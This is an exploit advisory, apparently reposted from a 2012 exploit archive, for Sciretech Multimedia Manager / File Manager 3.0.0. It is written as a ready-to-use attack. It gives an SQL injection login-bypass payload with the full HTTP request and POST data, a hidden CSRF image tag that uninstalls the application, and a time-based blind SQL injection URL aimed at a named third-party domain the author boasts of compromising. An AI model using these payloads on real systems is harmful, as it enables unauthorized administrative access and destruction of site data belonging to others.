Home / exploitsPDF  

Sciretech 3.0.0 SQL Injection / CSRF

Posted on 04 September 2012

=========================================================
Vulnerable Software: Sciretech ® Multimedia Manager Version 3.0.0
 Aka:
Sciretech ® File Manager Version 3.0.0

Official site: www.sciretech.com

Vulnerabilities: Blind SQL Injection And CSRF

Dork: Google is Best Your Friend.Isn't?)

Discovered and Exploited in Wild.(For Pwn domain: software.yna.am)

===========================================================
Official Demo:
www.sciretech.com/demo/

Email: admin@domain.com' and 99=99-- and 0='0
PASS: whateveryouwant

Note that: You need to enter valid email of admin.
In most cases it is: admin@MUST_PWN_THIS_DOMAIN.tld

Let me enlight it for you:

Host: www.sciretech.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cookie: PHPSESSID=brn7te3s5dtkmo63578umm6kp7
Content-Type: application/x-www-form-urlencoded
Content-Length: 123

POST DATA:

dbuser_user_email=admin%40domain.com%27+and+99%3D99--+and+0%3D%270&dbuser_user_password=WILL_BYPASS_IT_LIKE_2X2&login=Login

You will be logged to administration panel=> http://www.sciretech.com/demo/index.php?module=system&content=index

Host: www.sciretech.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cookie: PHPSESSID=brn7te3s5dtkmo63578umm6kp7

==============================================================
CSRF UNINSTALL APPLICATION:( BTW,Very usefull xD )

<img src="http://software.yna.am/index.php?module=control_panel&content=execute&execute=uninstall" heigth="0" width="0" />

==============================================================

Next another Blind SQLi:

http://software.yna.am//index.php?module=user&content=execute&execute=user_account_activation&user_email=pipi@pipi.com%27%20or%20sleep%2810%29--%20and%205=%275&activation_key=TS0nz4hLVgZ83mrvgtPS

======================================================================
If you unable to find valid email of admin use time Based way to obtain EMAIL:PASSWORD

======================================================================
SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:
======================================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all Aa Team + to all Azerbaijan Black HatZ +
 *Especially to my bro CAMOUFL4G3.*
========================================================================

/AkaStep

02.09.2012

 

TOP

Malware :

Exploits :